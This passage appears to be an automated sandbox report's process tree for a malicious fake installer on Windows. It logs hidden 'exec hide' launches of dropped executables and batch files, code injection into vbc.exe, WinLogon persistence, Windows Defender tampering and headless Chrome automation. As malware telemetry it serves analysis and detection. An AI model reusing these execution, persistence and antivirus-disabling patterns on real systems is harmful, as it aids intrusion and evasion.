C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:7968

C:\Users\Admin\AppData\Roaming\uciugwj
C:\Users\Admin\AppData\Roaming\uciugwj
1⤵
PID:4280
- C:\Users\Admin\AppData\Roaming\uciugwj
  C:\Users\Admin\AppData\Roaming\uciugwj
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:8120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5228 -ip 5228
1⤵
PID:7028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5508 -ip 5508
1⤵
PID:8068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6980 -ip 6980
1⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:6624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5648 -ip 5648
1⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:5648

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:7356
- C:\Users\Admin\AppData\Local\Temp\is-R3PQ3.tmp\is-1O8RL.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-R3PQ3.tmp\is-1O8RL.tmp" /SL4 $7046C "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  PID:6008

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:6292
- C:\Users\Admin\AppData\Local\Temp\is-RLIAI.tmp\is-I05L8.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-RLIAI.tmp\is-I05L8.tmp" /SL4 $1603AE "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:4688

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:8128
- C:\Users\Admin\AppData\Local\Temp\is-GFR7O.tmp\is-SC6PG.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-GFR7O.tmp\is-SC6PG.tmp" /SL4 $9030C "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:6492

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2064
- C:\Users\Admin\AppData\Local\Temp\is-GOBNR.tmp\is-VHBPS.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-GOBNR.tmp\is-VHBPS.tmp" /SL4 $90342 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:7096

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:4244
- C:\Users\Admin\AppData\Local\Temp\is-MEA99.tmp\is-S657C.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-MEA99.tmp\is-S657C.tmp" /SL4 $D0322 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:6104

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:5480
- C:\Users\Admin\AppData\Local\Temp\is-GU501.tmp\is-LQG72.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-GU501.tmp\is-LQG72.tmp" /SL4 $10500 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:1716

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2624
- C:\Users\Admin\AppData\Local\Temp\is-LBEP5.tmp\is-KOI1L.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-LBEP5.tmp\is-KOI1L.tmp" /SL4 $1050C "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:6296

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1788
- C:\Users\Admin\AppData\Local\Temp\is-RDPAP.tmp\is-OOJDL.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-RDPAP.tmp\is-OOJDL.tmp" /SL4 $10524 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:412

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1368
- C:\Users\Admin\AppData\Local\Temp\is-5H1LC.tmp\is-KBELP.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-5H1LC.tmp\is-KBELP.tmp" /SL4 $10550 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:8000

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:6100
- C:\Users\Admin\AppData\Local\Temp\is-9QFUC.tmp\is-F3DI9.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-9QFUC.tmp\is-F3DI9.tmp" /SL4 $304F4 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:7732

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:6256
- C:\Users\Admin\AppData\Local\Temp\is-JEL0R.tmp\is-MF08M.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-JEL0R.tmp\is-MF08M.tmp" /SL4 $10554 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:3996

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:6160
- C:\Users\Admin\AppData\Local\Temp\is-NTFQ4.tmp\is-Q3K08.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-NTFQ4.tmp\is-Q3K08.tmp" /SL4 $2056E "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:7256

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6120

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2212

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1476

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7180

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
PID:5548

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
PID:8188

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5292

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6532

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5824

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3968

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
PID:5420
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:7440
- - C:\Users\Admin\AppData\Local\Temp\animecool.exe
    C:\Users\Admin\AppData\Local\Temp\animecool.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:6148
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:1944
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:4036
- - C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:8136
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:5448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
    3⤵
    PID:7560
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide fds333333333333333.bat
      4⤵
      PID:5388

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
PID:6404
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:7768
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:5940
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:7552

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:464
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:7808
- - C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:3148
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:860
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:6756

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
PID:6520
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4280
- - C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    3⤵
    - Modifies WinLogon for persistence
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    PID:6340
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:5328
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:4380

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
PID:1160
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:7324
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:5492
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:1840

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6008

C:\Users\Admin\AppData\Local\Temp\animecool.exe
C:\Users\Admin\AppData\Local\Temp\animecool.exe
1⤵
PID:1632
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:2680

C:\Users\Admin\AppData\Local\Temp\animecool.exe
C:\Users\Admin\AppData\Local\Temp\animecool.exe
1⤵
- Suspicious use of SetThreadContext
PID:5384
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:112

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:4512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
PID:6920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
  2⤵
  PID:6336

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
PID:6664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
  2⤵
  PID:8136
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
1⤵
PID:6268
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
  2⤵
  PID:6716
- - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
    nig1r21312312.exe exec hide cock123123444.bat
    3⤵
    PID:5028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cock123123444.bat
      4⤵
      PID:7600
    - - C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
        
        MisakaMikoto213213.exe
        5⤵
        
        PID:7264
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        
        PID:5844
    - - C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
        
        cockcreator.exe
        5⤵
        
        PID:1660
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-OCafRJ --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        6⤵
        
        PID:7260
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-OCafRJ /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-OCafRJ\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-OCafRJ --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0x9c,0x110,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        7⤵
        Suspicious use of SetThreadContext
        
        PID:6508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1296 --field-trial-handle=1440,i,11603632168889738495,16339311113893799049,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        7⤵
        
        PID:8656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=1728 --field-trial-handle=1440,i,11603632168889738495,16339311113893799049,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        7⤵
        
        PID:9368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2388 --field-trial-handle=1440,i,11603632168889738495,16339311113893799049,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        7⤵
        
        PID:9836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1848

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
PID:2384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
  2⤵
  PID:7768
- - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
    nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
    3⤵
    PID:8176
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide cock123123444.bat
      4⤵
      PID:7340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
    3⤵
    PID:1004

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:6704

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide fds333333333333333.bat
1⤵
PID:6508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cock123123444.bat
1⤵
PID:5928
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:864
- C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
  MisakaMikoto213213.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4796
- C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
  cockcreator.exe
  2⤵
  PID:4284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-2OHjLl --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
    3⤵
    PID:1160
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-2OHjLl /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-2OHjLl\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-2OHjLl --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
      4⤵
      PID:7160
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1396 --field-trial-handle=1516,i,905490468504228396,14665407043699047275,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
      4⤵
      PID:8684
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=1960 --field-trial-handle=1516,i,905490468504228396,14665407043699047275,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
      4⤵
      PID:9384
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1980 --field-trial-handle=1516,i,905490468504228396,14665407043699047275,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
      4⤵
      PID:9828

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
1⤵
PID:7760
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  nig1r21312312.exe exec hide cock123123444.bat
  2⤵
  PID:6328
- - C:\Windows\SysWOW64\cmd.exe
